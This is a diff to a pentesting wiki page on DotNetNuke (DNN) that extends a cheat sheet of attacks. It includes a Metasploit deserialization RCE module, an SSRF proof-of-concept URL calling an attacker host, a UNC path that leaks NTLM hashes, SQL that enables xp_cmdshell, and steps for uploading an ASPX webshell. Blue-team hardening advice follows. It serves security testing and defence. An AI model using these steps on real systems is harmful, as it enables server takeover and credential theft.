diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index f4d9e33c806..f8600876a59 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -4,44 +4,97 @@ ## DotNetNuke (DNN) -If you enter as **administrator** in DNN it's easy to obtain RCE. +If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work. -## RCE +--- +## Version & Environment Enumeration -### Via SQL +* Check the *X-DNN* HTTP response header – it usually discloses the exact platform version. +* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs). +* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users. +* Typical cookies you will see on a live instance: + * `.DOTNETNUKE` – ASP.NET forms authentication ticket. + * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below). -A SQL console is accessible under the **`Settings`** page where you can enable **`xp_cmdshell`** and **run operating system commands**. +--- +## Unauthenticated Exploitation -Use these lines to enable **`xp_cmdshell`**: +### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups) +*Affected versions ≤ 9.3.0-RC* + +`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution. -```sql -EXEC sp_configure 'show advanced options', '1' -RECONFIGURE -EXEC sp_configure 'xp_cmdshell', '1' -RECONFIGURE ``` +msf> use exploit/windows/http/dnn_cookie_deserialization_rce +msf> set RHOSTS +msf> set LHOST +msf> run +``` +The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x–9.1.x and with a *verified* low-privilege account on 9.2.x+. -And press **"Run Script"** to run that sQL sentences. +### 2. Server-Side Request Forgery (CVE-2025-32372) +*Affected versions < 9.13.8 – Patch released April 2025* -Then, use something like the following to run OS commands: +A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF). Practical impacts: -```sql -xp_cmdshell 'whoami' +* Internal port scan / metadata service discovery in cloud deployments. +* Reach hosts otherwise firewalled from the Internet. + +Proof-of-concept (replace `TARGET` & `ATTACKER`): +``` +https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc ``` +The request is triggered in the background; monitor your listener for callbacks. -### Via ASP webshell +### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488) +*Affected versions 6.0.0 – 9.x (< 10.0.1)* -In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, and then clicking the `Save` button. +Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to **10.0.1** or disable outbound SMB at the firewall. -Add **`asp`** or **`aspx`** and then in **`/admin/file-management`** upload an **asp webshell** called `shell.asp` for example. +### 4. IP Filter Bypass (CVE-2025-52487) +If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario. -Then access to **`/Portals/0/shell.asp`** to access your webshell. +--- +## Post-Authentication to RCE -### Privilege Escalation +### Via SQL console +Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands: -You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example. +```sql +EXEC sp_configure 'show advanced options', 1; +RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; +RECONFIGURE; +GO +xp_cmdshell 'whoami'; +``` -{{#include ../../banners/hacktricks-training.md}} +### Via ASPX webshell upload +1. Go to **`Settings → Security → More → More Security Settings`**. +2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**. +3. Browse to **`/admin/file-management`** and upload `shell.aspx`. +4. Trigger it at **`/Portals/0/shell.aspx`**. + +--- +## Privilege Escalation on Windows +Once code execution is achieved as **IIS AppPool\**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage: + +* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*. +* **Juicy/Sharp Potatoes** to escape *Service Accounts*. + +--- +## Hardening Recommendations (Blue Team) +* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues). +* Remove residual **`InstallWizard.aspx*`** files after installation. +* Disable outbound SMB (ports 445/139) egress. +* Enforce strong *Host Filters* on the edge proxy rather than within DNN. +* Block access to `/API/RemoteContentProxy` if unused. + +## References + +* Metasploit `dnn_cookie_deserialization_rce` module documentation – practical unauthenticated RCE details (GitHub). +* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information. +{{#include ../../banners/hacktricks-training.md}}